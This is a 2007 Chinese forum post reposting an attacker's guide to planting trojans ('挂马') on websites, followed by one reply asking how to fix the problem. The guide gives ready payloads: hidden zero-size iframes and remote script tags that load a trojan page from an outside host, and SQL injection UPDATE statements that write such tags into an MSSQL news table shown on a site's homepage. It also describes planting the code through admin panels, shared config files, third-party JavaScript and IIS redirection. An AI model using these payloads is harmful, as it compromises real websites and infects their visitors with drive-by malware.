广告广告
  加入我的最爱 设为首页 风格修改
首页 首尾
 手机版   订阅   地图  繁体 
您是第 2915 个阅读者
 
发表文章 发表投票 回覆文章
  可列印版   加为IE收藏   收藏主题   上一主题 | 下一主题   
millets 手机
个人头像
个人文章 个人相簿 个人日记 个人地图
初露锋芒
级别: 初露锋芒 该用户目前不上站
推文 x0 鲜花 x32
分享: 转寄此文章 Facebook Plurk Twitter 版主评分 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片
推文 x0
木马网站渗透
文章作者:Pixy
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
=============================================
  普通法:(Iframe用法详解 — http://zhidao.baidu.com/que...5.html?si=2)
  一普通的挂马的都是用框架,这是最基本的挂马方式,那就想插入哪里就写哪里了
最基本的语句当然是
<iframe src=http://www.xxxx.com/muma.htm width=0 height=0></iframe>
  其中http://www.xxxx....ma.htm是我们的木马

Js法:
  上面可能是一般的挂马方式,初学者的玩法,好了,再说深一点点的,那就是js档案,现在好多网站都调有了JS
  其中的语句是:
<script language=javascript src=./xxxx.js></script>,想到了什么,这里也可以挂马,其中我们可以远程调用自己的js

  比如:<script language=javascript src=http://www.xxxx.com/muma.js></script>
  这个muma.js就可以写木马了,怎么写呢,同样,我们还用最基本的iframe框架,不过在<script></script>之中可识别语言不是html,js档案可以这样写:
  document.write("<iframe <iframe src=http://www.xxxx.com/muma.htm width=0 height=0></iframe>");

  这种形式,这时就可以执行此js中的代码了,当然了,说白了,其实全语句就是
<script language=javascript>document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>")</script>
Js技巧:

  <script></script>之中,无论什么后缀的档案,只要里面写的语句可以被javascript识别就会执行,比如<script src=http://www.xxxx.com/mm.ooaa></script>
      <script src=http://www.xxxx.com/mumma.haha></script>

不管后缀是什么了 都可以执行...
同样,如果首页调用其它网站,或者次级目录中的Html,Asp等
例:<iframe src=./about/nihao.htm width=200 height=100></iframe>
也可以在nihao.htm档案里挂马,可以是htm和js,随便哪种,这种比较隐蔽,适用于主页没有写权限时利用。

  <script>于<iframe>比较
貌似script整体挂马的代码长度比iframe小得多,说实用是在资料库方面,下面介绍。资料库挂马,这里我们拿mssql资料库为例子。

  这里说的是首页调用到的资料库,比如新闻,论坛,公告,等等,一般是标题。  
举个例子,比如首页有一条新闻为:「今日报道」,那么滑鼠点此新闻,地址栏打开的新窗口为news.asp?id=XX,这种情况,这时,就可以判断此新闻是从资料库中调用的了,当然了,我们不说access,只说mssql。

  首页,我们要有这个网站中的一个注入点,比如就点在music.asp?id=1,同时,至少是Db_Owner权限,这时如果要挂马可以不用取到webshell,因为如果我们的目的只在于挂马的话,而且有时,还得检测mssql资料库和web服务器不在同一个机器上,那挂马的方式就是更改资料库内容,这里我说的就是这种,如上面说的,首页显示的一条新闻标题为「今日报道」,如果首页显示的标题是「今日报道</a><iframe src=http://www.xxxx.com/muma.htm width=0 height=0></iframe>」,那这样的话,首页就会执行这段代码了,像这种情况,找到了注入点,就得找表名,如此新闻的表名为news,字段为title,ID等等,根据猜测 ' and1=1 ……

暴出的字段title的值就为「今日报道」,那么90%就可以猜到了,首页调用的资料库的字段就为news表中的title,这时在注入点,可以大胆提交music.asp?id=xxx;update news set title='今日报道</a><iframe src=http://www.xxxx.com/muma.htmwidth=0 height=0></iframe>' where id=1;

  这样就可以更改资料库了,前提是最少要少Db_Owner权限,当然也有时由于代码原因,也可以这样提交:Music.asp?id=xxx'update news set title='今日开夜</a><ifrmae src=http://www.xxxx.com/muma.htm width=0 height=0></iframe>' where id=1 and Ƈ'=Ƈ 等等……

  这种方法是有问题的,实战中存在不少问题,因为一般的情况下,标题都是通过<table>来限制宽度,也就是说如果你的标题的长度超过了指定的长度,那么你的代码只能写一半,这样就不能执行了,所以挂马最好的方法是用<script>这种方法来挂马了,如:
music.asp?id=xxx;update news set title='今日报道</a><script src=http://www.xxxx.com.muma.htm></script>' where id=1;--长度有很大的减少,很不错。

后台挂马法:
通常拿不到webshell,就只能靠进后台挂马。

这里说的是进入了后台,但不能通过后台得到webshell,这时要仔细关察后台,像比较网站的链接、顶部底部的广告、都可以直接写入你的木马代码,等等,后台是灵活的,具体问题具体分析。不过有一点很重要,是不要打乱前台htm源档案里的代码逻辑,比如应该闭合前面的<a><img>"( 等这些符号,应该先闭合掉如</a></img>")。

其它形式

例如首页调用了<iframe src=music.asp?id=1&no=view width=100></iframe>此种形势,一样可以在music.asp中直接写入iframe木马代码,如果调用的是<script src=music.asp?id=1&no=view width=100></script>在music.asp写代码时
请用document.write("")这种格式写入,当然,如果被挂档案中还有调用的档案可以继续往深处写,如果你够狠的话,直接写到资料库配置档案中,如conn.asp,这样好多页面可以同时挂上你的一种木马了。
当然这里也有js档案,一样原理。
挂一个网站的马,不一定就得攻入他,有时没有方法的同时,可以考虑跨站。好多站用了别的站的js档案,如:<script src=http://www.sohu.com/user.js>这种情势,这时就可以考虑只拿sohu.com的权限就行了,只要能修改到user.js档案就可以挂到你要挂的站点了,同理,也有<iframe src=http://www.sohu.com/user.htm>此种情况,一样道理,剑走偏锋,达到目的,无论用什么招数了。

服务器挂马法:
这里简单说一个比较狠的吧.重定向任何调用的htm,js,等档案,只要是执行的

这种方法在计算中用搜索搜索不到的,反正本地怎么找也找不到。只能在IIS里设置..而且调用档案那么多,怎么知道是重定向的那个档案呢?

此文章被评分,最近评分记录
财富:50 (by upside) | 理由: 感谢提供 参考资料 数位男女因你而丰富



献花 x0 回到顶端 [楼 主] From:台湾中华HiNet | Posted:2007-02-14 16:28 |
almostafa
个人头像
个人文章 个人相簿 个人日记 个人地图
小人物
级别: 小人物 该用户目前不上站
推文 x0 鲜花 x35
分享: 转寄此文章 Facebook Plurk Twitter 复制连结到剪贴簿 转换为繁体 转换为简体 载入图片

那请问是否可解呢?近来似乎遇上这个问题?


合得我意,恐非人意,合得人意,不合我意;我意人意,皆非天意,合得天意,自然如意!
献花 x0 回到顶端 [1 楼] From:台湾中华电信HINET | Posted:2007-02-17 02:22 |

首页  发表文章 发表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.018731 second(s),query:16 Gzip disabled
本站由 瀛睿律师事务所 担任常年法律顾问 | 免责声明 | 本网站已依台湾网站内容分级规定处理 | 连络我们 | 访客留言